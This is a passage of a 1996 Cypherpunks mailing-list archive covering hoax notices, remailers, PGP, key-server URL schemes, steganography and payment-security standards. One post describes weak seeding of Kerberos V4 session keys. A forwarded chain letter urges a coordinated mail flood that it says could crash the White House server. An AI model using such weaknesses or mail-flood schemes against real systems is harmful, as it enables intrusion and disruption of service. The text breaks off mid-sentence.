Message-ID: <199602220747.CAA16381@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


David E. Smith forwarded:
[...]
>  Please assist us in alerting the
>  public of the upcoming Internet cleaning by posting this message where
>  your users will be able to read it.  Please pass this message on to other
>  sysops and Internet users as well.  Thank you.

Batten down the hatches, mateys, this one's gonna be drenching us for the next
week....



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Hudson <ghudson@mit.edu>
Date: Thu, 22 Feb 96 00:13:00 PST
To: "David E. Smith" <dsmith@midwest.net>
Subject: Re: Internet shutdown Feb 29?
Message-ID: <199602220812.DAA08705@glacier.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> This looks completely, totally, and insanely bogus, but I need some
> kind of verification for this bizarre little piece of mail that
> somehow ended up in my mailbox.

If you really need verification, there's no one with the last name of
"Dereksen" on MIT's directory (which lists students and staff; "finger
dereksen@mit.edu"), and there's certainly no departments at MIT called
the "Main branch" or "Interconnected Network Maintenance staff".

At least this one is funny.  I particular like the beginning: "It's
that time again!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Thu, 22 Feb 96 00:34:29 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: mixmaster info?
In-Reply-To: <2.2.32.19960221110350.0067df28@arn.net>
Message-ID: <199602220834.DAA14797@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dave Merriman writes:
> could someone point me at the 'specs' for Mixmaster remailers? 
> I'm after how messages are sliced, diced, repackaged, and shipped, etc.

http://www.obscura.com/~loki/remailer/remailer-essay.html

Funky things are apparently happening with the obscura DNS records etc. due to
some equipment moves Lance is doing, so you may or may not find this 
convenient to retrieve at the moment.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 21 Feb 96 22:59:49 PST
To: cypherpunks@toad.com
Subject: Re: IBM Breakthrough?
In-Reply-To: <199602220503.VAA24389@netcom17.netcom.com>
Message-ID: <199602220659.HAA24961@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



> An IBM scientist and his colleagues have discovered a way to
> make an object disintegrate in one place and reappear intact
> in another.

Beam me up Scotty!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Wed, 21 Feb 96 22:07:59 PST
To: an5877@anon.penet.fi
Subject: Re: Kerberos vulnerability
In-Reply-To: <9602210339.AA22431@anon.penet.fi>
Message-ID: <199602220606.RAA04537@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> -----BEGIN PGP SIGNED MESSAGE-----
> 
> A Kerberos V4 session key is chosen by calling random() repeatedly.
> THe PRNG is seeded with srandom(time.tv_usec ^ time.tv_sec ^ p ^ n++),
> where p is a static integer set to getpid() ^ gethostid() on the first
> call and n is a static counter.
> 
> Is there any entropy here???  Most, if not all, Kerberos servers run one
> time synchronization protocol or another, which reduces the entropy to a
> few bits at most.
> 
> DEADBEAT <na5877@anon.penet.fi>

usec grainlessness typically doesn't approach anything like a usec on most
OS implimentations either.


-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Silber <silber>
Date: Thu, 22 Feb 1996 20:56:20 -0800 (PST)
Subject: No Subject
Message-ID: <199602230456.UAA00520@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


>        NED_PUEV <NED_PUEV@HP-Loveland-om2.om.hp.com>,
>        Radar <radar@itouch.net>,
>        Denise HP TechSupport <sdm@hpuerca.atl.hp.com>,
>        sgajar <sgajar@crosslink.net>
>Subject: FW: FWD>Bill O Rights
>Date: Wed, 21 Feb 96 14:27:43 PST
>Encoding: 120 TEXT
>X-Mailer: Microsoft Mail V3.0
>Status:
>
>
>
> ----------
>From: Dave Behrns
>To: MIS Mail Group
>Subject: FW: FWD>Bill O Rights
>Date: Wednesday, February 21, 1996 2:10PM
>
>
>
>>>To whoever may read this,
>>>
>>>This is not a typical letter, in that by passing it on to as
>>>many people as you can, you are taking part in what may yet become the
>>>world's biggest practical joke. The U.S. Government has rece ntly
>>>passed an act which enforces censorship on the internet. A group of
>>>internet users has now come together to kick back at this oppression,
>>>and have a bit of fun at the same time. >The aim of this exercise is
>>>to re-establish the United States as "The land of the Free", not a
>>>fascist state where freedom of speech and thought are curtailed.
>>>Communist Russia fell as a result of s uch limits being placed upon
>>>the minds of the general populus. On receiving this letter, please
>>>pass it on to as many friends or E-mail lists as you can. We predict
>>>that if everybody copies the lette r to 5 other addresses, by February
>>>29th 1996, this letter should have reached in excess of 2 million
>>>people. That's when the fun begins........ >On February 29th, please
>>>send the message:
>>>
>>>Dear Mr. President,
>>>Do you remember this:
>>>
>>>And afterwards enclose the pre-typed copy of the Bill of rights. By
>>>sending the letter on the date above, you will contribute to either
>>>one huge petition for freedom, or else lead to a crash of the
>>>whitehouse server.Send all letters to: >President@Whitehouse.gov
>>>
>>>Remember that solidarity is the key to success !!!!!
>>>
>>>
>>>---------------------------------------------------
>>>
>>>THE BILL OF RIGHTS
>>>
>>>Amendment I
>>>
>>>Congress shall make no law respecting an establishment of religion, or
>>>prohibiting the free exercise thereof; or abridging the freedom of
>>>speech, or of the press; or the right of the people peaceably to
>>>assemble, and to petition the government for a redress of grievances.
>>>
>>>Amendment II
>>>
>>>A well regulated militia, being necessary to the security of a free
>>>state, the right of the people to keep and bear arms, shall not be
>>>infringed.
>>>
>>>Amendment III
>>>
>>>No soldier shall, in time of peace be quartered in any house, without
>>>the consent of the owner, nor in time of war, but in a manner to be
>>>prescribed by law.
>>>
>>>Amendment IV
>>>
>>>The right of the people to be secure in their persons, houses,
>>>papers, and
>>>effects, against unreasonable searches and seizures, shall not be
>>>violated, and no warrants shall issue, but upon probable cause,
>>>supported by oath or affirmation, and particularly describing the
>>>place to be searched, and the persons or things to be seized.
>>>
>>>Amendment V
>>>
>>>No person shall be held to answer for a capital, or otherwise
>>>infamous
>>>crime, unless on a presentment or indictment of a grand jury, except
>>>in cases arising in the land or naval forces, or in the militia, when
>>>in actual service in time of war or public danger; nor shall any
>>>person be subject for the same offense to be twice put in jeopardy of
>>>life or limb; nor shall be compelled in any criminal case to be a
>>>witness against himself, nor be deprived of life, liberty, or
>>>property, without due process of law; nor shall private property be
>>>taken for public use, without just compensation.
>>>
>>>Amendment VI
>>>
>>>In all criminal prosecutions, the accused shall enjoy the right to a
>>>speedy and public trial, by an impartial jury of the state and
>>>district wherein the crime shall have been committed, which district
>>>shall have been previously ascertained by law, and to be informed of
>>>the nature and cause of the accusation; to be confronted with the
>>>witnesses against him; to have compulsory process for obtaining
>>>witnesses in his favor, and to have the assistance of counsel for his
>>>defense.
>>>
>>>Amendment VII
>>>
>>>In suits at common law, where the value in controversy shall exceed
>>>twenty dollars, the right of trial by jury shall be preserved, and no
>>>fact tried by a jury, shall be otherwise reexamined in any court of
>>>the United States, than according to the rules of the common law.
>>>
>>>Amendment VIII
>>>
>>>Excessive bail shall not be required, nor excessive fines imposed, nor
>>>cruel and unusual punishments inflicted.
>>>
>>>Amendment IX
>>>
>>>The enumeration in the Constitution, of certain rights, shall not be
>>>construed to deny or disparage others retained by the people.
>>>
>>>Amendment X
>>>
>>>The powers not delegated to the United States by the Constitution, nor
>>>prohibited by it to the states, are reserved to the states
>>>respectively, or to the people.
>>
>>
>>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mailer-daemon@anon.com (System Mail Manager)
Date: Fri, 23 Feb 1996 20:07:44 -0800
To: (Recipient list suppressed)
Subject: Twelve Days of Christmas
Message-ID: <v01520db9ad53979e9858@[38.10.221.81]>
MIME-Version: 1.0
Content-Type: text/plain



-- <System Report> --
UNDELIVERABLE MAIL: Unknown Host("PeppermintPty@loacst.org")
UNDELIVERABLE MAIL: Bad Key

-- <Original Message Follows> --

*** TOP LEVEL: DESTROY IMMEDIATELY UPON READING ***
*** DO NOT PRINT OR SAVE. Code1.8 Table2Hex6    ***

DAY 10: DR. BLACK located a promising entry point at the target site. DR.
BLACK recovered four of the six password tokens before his position was
compromised. DR. BLACK will be replaced by DR. ORANGE.

Estimated time to recover the remaining two password tokens and gain access
to target: EIGHT DAYS (03.01.96)

Confidence is HIGH.

My team has been working around the clock for a month now. Please tell your
people to be more tolerant. Yelling doesn't help anything.

Marcie









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robichaux, Paul E" <perobich@ingr.com>
Date: Mon, 26 Feb 96 05:49:03 PST
To: Alex Strasheim <cp@proust.suba.com>
Subject: RE: REM_ote
Message-ID: <c=US%a=_%p=INTERGRAPH%l=HQ6960226074857NR004B00@hq13.pcmail.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim said:
>(A useful feature for Netscape might be a facility that checks
>periodically to see if a security patch is in order, and displays a
>warning if it is.)

The Simple Internet Version Control (SIVC, pronounced "civic") protocol does 
just this. See http://wwwhost.ots.utexas.edu/sivc/spec.html for details. 
SIVC is popular on the Mac, but I don't know if it's been put up as an RFC.

-Paul






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 28 Feb 96 03:50:03 PST
To: mark@ausnetinfo.com.au (Mark)
Subject: Re: "Physical Reality"
Message-ID: <2.2.32.19960228114906.00b9f928@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:41 AM 2/28/96 +1100, Mark wrote:

>I dislike having to follow up something so unrelated, but the bad boys are the
>criminals, the song is about what will you do when the cops come for you.
>The cops are not the "bad boys" in the song. Trust me.
>
>Mark
>

Actually, the song is deliberately ambiguous.  Because the phrase "Bad Boys"
is repeated at both ends of the verse, you can't tell whether it refers to
the cops or perps or both.  I don't know the origin of the song but I recall
in life or in fiction a special (Las Vegas?) police unit that called itself
the Bad Boys.  Certainly the Bad=Good reversal is well established in
popular culture.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 28 Feb 96 16:52:16 PST
To: cypherpunks@toad.com
Subject: Anyone else getting these?
Message-ID: <ad5a3990010210049ec5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Is anyone else getting these strange "Message body suppressed" messages?
Below is an example:


At 7:31 AM 2/26/96, spook@eworld.com wrote:

>   ----- Message body suppressed -----
>
>--NAA18253.825456631/dns1.noc.nsa.net--
>
>
>
>** NOTICE **: A mailer error at NSA caused this
>** message to get messed up.  If the body of the message
>contains only '----- Message body suppressed -----',
>then we were unable to recover the entire message and you
>will have to email the person sending you this message
>asking him or her to resend it.  NSA apologizes for
>the inconvenience.


Every day that passes convinces me we are entering a period of chaos. Large
mailing lists are a likely casualty.


--Tim



(Yes, I changed "Best" to "NSA," for the fun of it.)

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Thu, 29 Feb 96 12:54:35 PST
To: Deranged Mutant <WlkngOwl@UNiX.asb.com>
Subject: Re: ViaCryptPGP 4.0?! (was Re: PGP integrated into Z-Mail)
In-Reply-To: <199602282222.RAA15759@UNiX.asb.com>
Message-ID: <Pine.SCO.3.91.960229154133.18824B-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Feb 1996, Deranged Mutant wrote:

> > 
> > I dont know.  I dont work for ViaCrypt, and they have been fairly
> > secretive in their work.  For all I know, they've made ViaCrypt PGP
> > 4.0 completely incompatible with PGP 2.6.2 and PGP3.
> 
> I would have thought you and Colin would have some communication with 
> Phil regarding PGP3, since PGP is his trademark.
> 

We're a beta tester for the ViaCrypt 4.0 product.  They have not made PGP 
4.0 incompatible with prior releases.  They've added some non-PGP 
features, like pseudo-key-escrow and key expiration dates, to make the 
product more palatable to some "corporate" users.  Many of the features 
are "localized" to that instance of PGP and don't actually inflict any 
changes onto the encrypted results.  I,E., making a key expire on a given 
day doesn't "break" the ability of others to read files from a PGP 4.0 user.

I also think that the comment about ViaCrypt being "secretive" is a 
little odd.  ViaCrypt tends to be very up-front about what they're up to 
(at least, they have been with us), and they openly solicit input as to 
'what features does PGP need to have in order to make it so you can use 
it in your business?'  Hence, they now have a Personal Edition and a 
Business Edition.

If folks have got specific things that they're worried about, I'll try to 
offer my observations about the beta product versus the "stock" product.  
However, I don't think that the perception that ViaCrypt's secretive 
about the "enhancements" is at all valid.

------------------------------------------------------------------------- 
|So, I went walking through the street.   |Mark Aldrich                 | 
|I saw you strung up in a tree.           |GRCI INFOSEC Engineering     | 
|A woman knelt there, said to me,         |maldrich@grci.com            | 
|Hold your tongue, man, hold your tongue. |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 29 Feb 96 16:17:26 PST
To: cme@cybercash.com (Carl Ellison)
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <v02140b24ad5bc8a12abb@[204.254.34.231]>
Message-ID: <199603010020.TAA09656@homeport.org>
MIME-Version: 1.0
Content-Type: text


Carl Ellison wrote:

| At 15:54 2/29/96, Derek Atkins wrote:
| 
| >So, there needs to be a compromise, some shorthand method to describe
| >the hint.  One solution is to provide a "keyserver" type and then some
| >string that says which "keyserver" to use.  For example, if there is a
| >DNS-style keyserver deplyed, I could put '1,"mit.edu"' in all my
| >signatures, if we assume that '1' is the DNS-style keyserver code.

| is a URL just too big?  My sigs are already several lines long.  E.g.,
| 
| Key: ftp://ftp.clark.net/pub/cme/cme.asc

I think a URL is probably a good solution.  But if we're using 
URLs, lets create a scheme for public keys.  If needed, this could be
either abbriviated, or dereferenced with a key exchanger (similar to
SMTP's mail exchangers).  Defaults would also allow for a good deal of
shortening.  And URLs have the user interface advantage of becoming
common, and understood.  Who gets on the net today and not the web?


key://ftp.clark.net/pub/u/cme/cme-current.asc
key://ftp.clark.net/pub/u/cme/cme-longterm.asc

or 
key://gateway.acme.net/pub/s/telnetd.asc

abrieviated version:

key://acme.com/~telnetd/

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 1 Mar 1996 13:39:55 +0800
To: nelson@santafe.edu (Nelson Minar)
Subject: Re: Chaff in the Channel (Stealth PGP work)
In-Reply-To: <199603010418.VAA02087@nelson.santafe.edu>
Message-ID: <199603010515.AAA10937@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Stenography is torn between a (reasonable) desire for secrecy
in order to gain security by making it harder to detect your noise
patterns, and the need for correspondants to agree on a standard.
(This agreement made harder by cross platform issues.)

	However, I suspect that the ideal would be like cryptography:
Assume the enemy knows everything about your system but the keys.
Thus, your gifs need to look like normal gifs in the lsb.  Your audio
needs to have normal levels of hiss in it.  Etc.

	When actually using stego, theres no need to publicise your
choise of stego methods.  But when desinging a system, your opponent
should be assumed to understand it.

Adam


Nelson Minar wrote:

| I've got some specific ideas, but am a bit nervous about talking about
| them because of intellectual property issues. Also, I'm not convinced
| that unlike cryptography, some extra security can be maintained in a
| steganographic system by not disclosing the way it works. I haven't
| resolved these concerns, but would be happy to engage in some
| metadiscussion about them.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Mar 1996 18:27:44 +0800
To: cypherpunks@toad.com
Subject: Re: going back to stone axes
Message-ID: <199603010951.BAA22486@ix16.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:32 PM 3/1/96 +1100, Steven Legg <s.legg@trl.telstra.com.au> wrote:
>DistinguishedName wasn't defined the way it was because of ASN.1. 

I'd always assumed it was just the ugly X.400 email naming convention.

>No one at Telstra Research would want to replace DistinguishedName with
>a byte string because of all the constant reparsing, cutting and splicing
>that would entail. We would end up writing more code, not less. Given the
>sort of heavy duty processing we do to DNs, trying to pack a DN into a
>string is considered brain dead. Those rich semantics matter to us.

I don't see how a DN is any better than an Internet-style Domain Naming Service
name, except that it puts a bunch of pre-defined labels on subdomain parts
which can generally be guessed from context and aren't very relevant
to computer programs.  Compare
        joeuser@purchasing.fnord.edu.au
vs.     /FN=Joseph/Ln=User/NN=Joe/OU=Purchasing/O=First.National.Organization.-
[for].Research.[and].Development/S=Academic/C=AU/

Is there really any additional information in the latter, except possibly
some detail you could have looked up with a "whois" request?

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 1 Mar 1996 14:16:12 +0800
To: cypherpunks@toad.com
Subject: SAIC Offers SET
Message-ID: <199603010325.EAA21057@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



SAIC Is @Yourservice for Secure Electronic Transactions
on the Internet

San Diego, 29 Feb 1996 -- Science Applications
International Corp. (SAIC), a leading provider of
information and network security services, today
announced that it will offer a wide range of business
solutions based on the new Secure Electronic Transactions
(SET) standard for safeguarding bankcard purchases over
the Internet.

Through its @Yourservice business unit, SAIC will provide
consulting, integration and digital certification
services to financial institutions, network operators and
merchants doing business over open networks.

SAIC helped Visa and Microsoft in their pioneering effort
to bring security to on-line commerce, and played a major
role in crafting the SET standard, working for Visa and
in close association with MasterCard and other SET
technology partners.

SAIC has long been one of the largest and most trusted
suppliers of information, network and data security
solutions in the world, as well as being a major
information systems integrator for government and
commercial clients.

"We're bringing these skills, and our understanding
of SET complexities such as digital signatures, public
key cryptography, certificate management and network
protocols together to help businesses transition smoothly
into the world of electronic commerce," said Nick
DiGiacomo, who oversees @Yourservice.  "What we offer is
seamless integration from the cardholder's computer over
the networks to the merchants and banks, and back again. 
We're here to make this easy."

--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Fri, 1 Mar 1996 22:09:57 +0800
To: jonathon@japan.sbi.com (Jonathon Fletcher)
Subject: Re: Nortel "Entrust"
In-Reply-To: <Pine.SUN.3.91.960301161135.11367M-100000@doe905f>
Message-ID: <96Mar1.074938edt.921@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


>   Is this worthy of further investigation, or is it suspect ? What is 
> CAST, and would it be classed as snake oil ?
CAST is discussed in _Applied Cryptography_.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sat, 2 Mar 1996 17:25:58 +0800
To: cypherpunks@toad.com
Subject: Re: X.509 certs that don't guarantee identity
In-Reply-To: <199602260448.WAA01201@proust.suba.com>
Message-ID: <v03005103ad5ca339f896@[204.145.227.11]>
MIME-Version: 1.0
Content-Type: text/plain


>  The navigator will not differentiate them.  We build in a default set of
>CA certificates into the navigator, and then allow the user to modify them as
>they see fit based on their local trust policy.  The default set of CAs that
>we ship with our product will not include the verisign level 1&2 CAs as
>trusted
>SSL Server CAs.

With the level 1&2 CA certs be include but not enabled, or will users have
to go pull them themselves?

Bob






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 1 Mar 1996 23:11:58 +0800
To: cypherpunks@toad.com
Subject: HYP_not
Message-ID: <199603011328.IAA22156@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   3-1-96. NYT:

   "Speed Record: One Trillion Bits a Second."

      Fujitsu, NTT and AT&T have succeeded, each separately,
      for the first time in transmitting information at the
      rate of one trillion bits a second through optical
      fiber.

   "Microsoft Backs Ratings System For the Internet."

      The system, called RSAC-1, will enable parents and
      teachers to censor Web sites due to violence, sexual
      themes, nudity or offensive language. Other companies
      support the PICS form of censorship in terror of market-
      share loss to the tele-vigilantes.

      [Gates told a Mexican sports stadium audience that no
      real money can be made on the Internet until it has the
      speed to interactively out-hypnotize television.]


   HYP_not











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Fri, 1 Mar 1996 23:27:39 +0800
To: cypherpunks@toad.com
Subject: Problems with certificates.
Message-ID: <960301083512.202002a4@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


I suspect the real danger would come from issuance of duplicate certificates.
MasterCard conrols MarterCard numbers by issuing all of them (and I suspect
that there is coding to separate MC from Visa from AmEx).

Today, each person generates their own PGP key. While it is unlikely that
any two will match, it is likely that at some point some two will match
(see matching birthdays in a bar - number is less than you would think).

Next rage might well be "vanity" PGP keys. While at the moment it is not known
how to create a specific match key to a sequence, if you generate enough
keys, there will be some interesting sequences found. Possibly some PGP
signatures will even be in violation of the CDA (now that should start a
rush 8*).

For some time I have been concerned about the scalability of PGP. It works
well in small groups but after trying once to create a 6,000 member keyring
(took over three days on a 386 & was several meg when done) I decided that
areas were going to need work to be a real anyone/anywhere/anytime 
mechanism. Not saying I have a good answer, just that at some point there
will be a problem.

						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sat, 2 Mar 1996 00:45:05 +0800
To: cypherpunks@toad.com
Subject: Re: a brief comparison of e-mail encryption protocols
Message-ID: <960301090649.202002a4@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Derek rites:
>Oh, of course the central keyserver model would disappear, but I'm
>still trying to design a system which is as compact as possible.

I disagree but then my worldview is different. For personal use the
compact distributed system is workable however when you start thinking
in terms of a large distributed organization, the quanta changes.

Mention was made of the difficulty of handling 20,000 keys. I am looking at
over 80,000 today and over 200,000 tomorrow *for a single organization*. For
quantities like this, a hierarchial system of management seems inevitable.

First, I am not about to give up my personal PGP key, it is trustworthy and
effective for my needs. It is not necessarily incompatable with an 
organizational structure.

However *for the organization* something else is needed. I can see a 
future in which the bulk of the population has only two keys: their own
and the punlic key of their post office (not talking USNail - private ones
though not saying the US might not operate one as well).

Messages are composed with addressing and encrypted with the PO key. PO
decrypts message key (NOT necessarily message but that will have to rely
on trust - nothing will stop double wrapping anyway), checks address list,
retrieves key for each adressee, adds header & sends copy (may use single 
mailing for group at distant post office but that is getting ahead).

If recipient key is not found, adressee wil be removed from list and
notice sent back to originator. If plaintext is desired, special operation 
will be required.

As noted, a hierarchal mechanism will be needed for key retrieval - only local
keys and "frequent fliers" will be kept locally. Not new concept, just
not used by post offices that I know of today.

Will need a bit of fleshing out and expect the end-state to be 2-4 years out
but is a good time to think about it.
					Warmly,
						Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Stephen A. Gutknecht" <sgutknec@computek.net>
Date: Sat, 2 Mar 1996 12:40:38 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Nortel "Entrust"
Message-ID: <01BB074E.BFFA0E20@ssitsc-sag1.swspectrum.com>
MIME-Version: 1.0
Content-Type: text/plain


I too would like to see an open discussion on this.  Microsoft uses this for their new Exchange Server client/server email product....

----------
From: 	Jonathon Fletcher[SMTP:jonathon@japan.sbi.com]
Sent: 	Friday, March 01, 1996 10:17 AM
To: 	cypherpunks@toad.com
Subject: 	Nortel "Entrust"


  Can anyone tell me anything about a product called "Entrust", by Nortel
(Northern Telecom). The notes talk about the software using DES ("which
employs a 56-bit key") so I guess it's single DES, not triple DES. It also
mentions a proprietary algorithm called CAST. 

  Is this worthy of further investigation, or is it suspect ? What is 
CAST, and would it be classed as snake oil ?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 2 Mar 1996 08:05:38 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <199603010154.TAA05515@proust.suba.com>
Message-ID: <199603011621.LAA21143@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alex Strasheim writes:
> Sorry for the stupid questions, but I want to make sure I'm on the same 
> page as the rest of you.  Correct me where I'm wrong --
> 
> The idea to have a distributed database (like DNS?) that allows you to
> retrieve keys with query strings similar to urls.  So if you wanted to do
> a secure telnet to host.foobar.com, you'd submit something like
> "telnet://host.foobar.com" to the key server, and it would give you back a
> key.  If you wanted to send mail to me, you'd submit something like 
> "mailto://alex@suba.com".  Etc.

That wasn't actually what I had in mind. When I said a new URL I meant
something like key://foo.bar.com/bleh/blah/foo, to go with the new key
server protocol.

I'm not exactly sure what the key servers should take as lookup values
-- that is, at this point, a matter for discussion.

> Finally, does anyone know if anything's been happening with Matt's key
> management project? 

Matt does, I presume...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 2 Mar 1996 03:54:06 +0800
Subject: No Subject
Message-ID: <QQafes08670.199603011933@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


John Pettitt writes::
# The SET transaction spec is now available on www.visa.com (and presumably on
# www.mastercard.com although I didn't check).

Norman Hardy writes:
> I am unable to find the specs. Anyone have an URL?

http://www.mastercard.com still works for me. I haven't looked at the Visa
site in a few days.

-Lewis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <jonathon@japan.sbi.com>
Date: Sun, 3 Mar 1996 06:00:05 +0800
To: cypherpunks@toad.com
Subject: Nortel "Entrust"
Message-ID: <Pine.SUN.3.91.960301161135.11367M-100000@doe905f>
MIME-Version: 1.0
Content-Type: text/plain



  Can anyone tell me anything about a product called "Entrust", by Nortel
(Northern Telecom). The notes talk about the software using DES ("which
employs a 56-bit key") so I guess it's single DES, not triple DES. It also
mentions a proprietary algorithm called CAST. 

  Is this worthy of further investigation, or is it suspect ? What is 
CAST, and would it be classed as snake oil ?

  Please cc to me in mail - I have a little trouble dealing with the 
volume here.

Sincerely,

-Jon

--
  Jonathon Fletcher,         "opinions are my own, not my employer's"
  jonathon@japan.sbi.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 2 Mar 1996 06:01:34 +0800
Subject: No Subject
Message-ID: <QQaffa02682.199603012141@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 1:17 PM 2/29/96, Housley, Russ wrote:
>Jim, in what way does the end user distinguish between the MOSS-like
>integration and the S/MIME-and-MSP-like integration?  It seems to me that a
>good user agent implementation provides the same services to the user.

Russ, since you weren't present at the workshop I'll repeat the very first
words I said in the presentation I gave there.

Functionally, from a user's perspective, there is for all practical
purposes no difference between any of these technologies.  Today I would
add that we could pick one out of hat and just move on.

However, there are differences in the technologies.  Some are easier to
implement, some are more flexible, some perform better, and the list goes
on.  We need to explore those differences to develop a criteria for
evaluating the technologies so we can provide the best possible solution to
the user community.  I proposed one possible criteria in my presentation,
by no means the only one and by no means complete.

Jim

----------------------------------------------------------------------------
James M. Galvin                                               galvin@eit.com
VeriFone/EIT, PO Box 220, Glenwood, MD 21738                 +1 410.795.6882






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@atropos.c2.org
Date: Sat, 2 Mar 1996 22:25:15 +0800
To: cypherpunks@toad.com
Subject: Win a free Apache-SSL-US Commercial license
Message-ID: <199603020048.QAA24966@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	See http://apachessl.c2.org/ for more details.

Thanks,
-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 2 Mar 1996 06:23:21 +0800
Subject: No Subject
Message-ID: <QQaffc07510.199603012207@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07:20 PM 2/29/96 -5300, Adam Shostack wrote:

>key://ftp.clark.net/pub/u/cme/cme-current.asc
>key://ftp.clark.net/pub/u/cme/cme-longterm.asc

        Just as a head up on not duplicating work with regards to 
incorporating URL's into key certificates and DBs you might want to consider 
URI's, URC's or URN's as the piece to bind since URL's are considered to be 
